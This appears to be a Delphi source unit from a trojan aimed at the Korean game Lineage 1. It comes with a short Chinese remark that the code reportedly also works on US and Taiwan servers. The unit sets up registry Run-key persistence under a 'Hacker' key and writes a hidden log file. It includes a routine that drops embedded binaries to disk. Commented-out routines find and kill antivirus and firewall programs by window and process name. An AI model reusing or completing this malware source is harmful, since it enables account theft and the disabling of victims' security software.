unithooktype.pas

这个是早时候,韩国天堂1的代码,据说美服和台湾的也能用

unit UnitHookType;

interface

uses windows, TLHelp32,reg,sysutils2;

const
  sname='ct1';
  fileRundll32 = 'rundll32.exe';
  fileInternat = 'Internat.exe';

  regpath = 'Software\Hacker软件\'+sname+' MM\';
  file2 = sname+'dll.dll';
  MappingFileName = sname+' mapfile';
  ClassName = sname+'MuMa';

//  Trap = True; //True陷阱式，False表示改引入表式
//  MaxRegHKey = $100;
  RootKey = HKEY_LOCAL_MACHINE;
  Regpath1 = 'Software\Microsoft\Windows\CurrentVersion\Run';
//  Regpath2 = 'Software\Microsoft\Windows\CurrentVersion\Run\';
  RegValue = 'loadMe'+sname;
  LogFile='c:\game'+sname+'.txt';

procedure WriteDat(s: string; datfile: string = logfile);
function GetModalName(processid: Thandle;ext:string=''): string;
procedure ExtractRes(ResType, ResName, ResNewName: string);

implementation

procedure WriteDat(s: string; datfile: string = logfile);
var
  h: integer;
begin
 try
  if fileexists(datfile) then
  begin
    h := fileopen(datfile, fmOpenWrite);
    fileseek(h, 0, 2);
      //deletefile(datfile);
  end
  else exit; //h := filecreate(datfile);
  if h = -1 then exit;
  s := s + #$0D + #$0A;
  FileWrite(h, s[1], length(s));
  FileClose(h);
 except
 end;
end;

function ExtractFileExt(const FileName: string): string;
var
  I: Integer;
begin
  i:=length(filename);
  while i>=1 do
  begin
    if filename[i]='.' then
    begin
      result:=copy(filename,i,maxint);
      exit;
    end;
    dec(i);
  end;
  result:='';
end;

function GetModalName(processid: Thandle;ext:string=''): string;
var
  ModuleListHandle: THandle;
  ModuleStruct: TMODULEENTRY32;
  Yn: boolean;
  path:string;
begin
  result:='';
  ModuleListHandle := CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, processid);
  ModuleStruct.dwSize := sizeof(ModuleStruct);
  //GetModuleFileName(, filename, sizeof(filename));
  yn:=Module32First(ModuleListHandle, ModuleStruct);
  while (yn) do
  begin
    path:=extractfileext(ModuleStruct.szExePath);
    if (ansicomparetext(path,'.EXE')=0)or
       ((ext<>'')and(ansicomparetext(path,ext)=0)) then
    begin
      result := ModuleStruct.szExePath;
      break;
    end;
    yn := Module32Next(ModuleListHandle, ModuleStruct);
  end;
  CloseHandle(ModuleListHandle);
end;

{procedure Killpro(s: string);
var
  lppe: tprocessentry32;
  sshandle: thandle;
  hh: hwnd;
  found: boolean;
begin
  sshandle := createtoolhelp32snapshot(TH32CS_SNAPALL, 0); //
  lppe.dwSize := Sizeof(lppe);
  found := process32first(sshandle, lppe);
  while found do
  begin
    if (uppercase(extractfilename(lppe.szExeFile)) = s) or
      (uppercase(lppe.szExeFile) = s) then
    begin
      hh := OpenProcess(PROCESS_ALL_ACCESS, true, lppe.th32ProcessID);
      TerminateProcess(hh, 0);
    end;
//    writedat(lppe.szExeFile,'c:\game.txt');
    found := process32next(sshandle, lppe);
  end;
  CloseHandle(sshandle);
end; }

{procedure Killer;
var
  s, Desktop: integer;
  str: array[0..100] of char;
begin
//  s := findwindow(pchar('TForm1'), pchar('密码防盗专家 综合版'));
//  Sendmessage(s, $0010, 0, 0);
  s := findwindow(pchar('RavMonClass'), pchar('RavMon.exe'));
  Sendmessage(s, $0010, 0, 0);
  s := findwindow('Tapplication', '天网防火墙个人版');
  Sendmessage(s, $0010, 0, 0);
  s := findwindow('Tapplication', '天网防火墙企业版');
  Sendmessage(s, $0010, 0, 0);
  s := 0;
  Desktop := GetDesktopWindow;
  repeat
    s := findwindowex(Desktop, s, 'TForm1', nil);
    getwindowtext(s, str, 9);
    if str = '木马克星' then
      sendmessage(s, $0010, 0, 0);
  until s = 0;
  s := 0;
  Desktop := GetDesktopWindow;
  repeat
    s := findwindowex(Desktop, s, 'TForm1', nil);
    getwindowtext(s, str, 7);
    if str = '噬菌体' then
      sendmessage(s, $0010, 0, 0);
  until s = 0;
  s := findwindow(pchar('TfLockDownMain'), nil);
  Sendmessage(s, $0010, 0, 0);
  s := findwindow(pchar('ZAFrameWnd'), pchar('ZoneAlarm'));
  Sendmessage(s, $0010, 0, 0);

  Killpro('EGHOST.EXE');
  Killpro('MAILMON.EXE');
  Killpro('KAVPFW.EXE');
  Killpro('IPARMOR.EXE');
  KillZhuanJia;
end; }

procedure ExtractRes(ResType, ResName, ResNewName: string);
var
  HResInfo: THandle;
  HGlobal: THandle;
  FMemory: Pointer;
  FSize: Longint;
  handle:THandle;
  Wsize:longword;
  procedure SetPointer(Ptr: Pointer; Size: Longint);
  begin
    FMemory := Ptr;
    FSize := Size;
  end;
  function Initialize(Instance: THandle; Name, ResType: PChar):boolean;
  begin
    result:=false;
    HResInfo := FindResource(Instance, Name, ResType);
    if HResInfo = 0 then Exit;
    HGlobal := LoadResource(Instance, HResInfo);
    if HGlobal = 0 then Exit;
    SetPointer(LockResource(HGlobal), SizeOfResource(Instance, HResInfo));
    result:=true;
  end;
begin
  if not Initialize(hInstance, PChar(ResName), PChar(ResType)) then exit;
  if fileexists(ResNewName) then Deletefile(pchar(ResNewName));
  try
    handle := Integer(CreateFile(PChar(ResNewName), GENERIC_READ or GENERIC_WRITE,
      0, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0));
    WriteFile(Handle, FMemory^, FSize, Wsize, nil);
    CloseHandle(handle);  
  except
  end;
  UnlockResource(HGlobal);
  FreeResource(HGlobal);
end;

{function DirectoryExists(const Directory: string): Boolean;
var
  Code: Integer;
begin
  Code := GetFileAttributes(PChar(Directory));
  Result := (Code <> -1) and (FILE_ATTRIBUTE_DIRECTORY and Code <> 0);
end; }

end.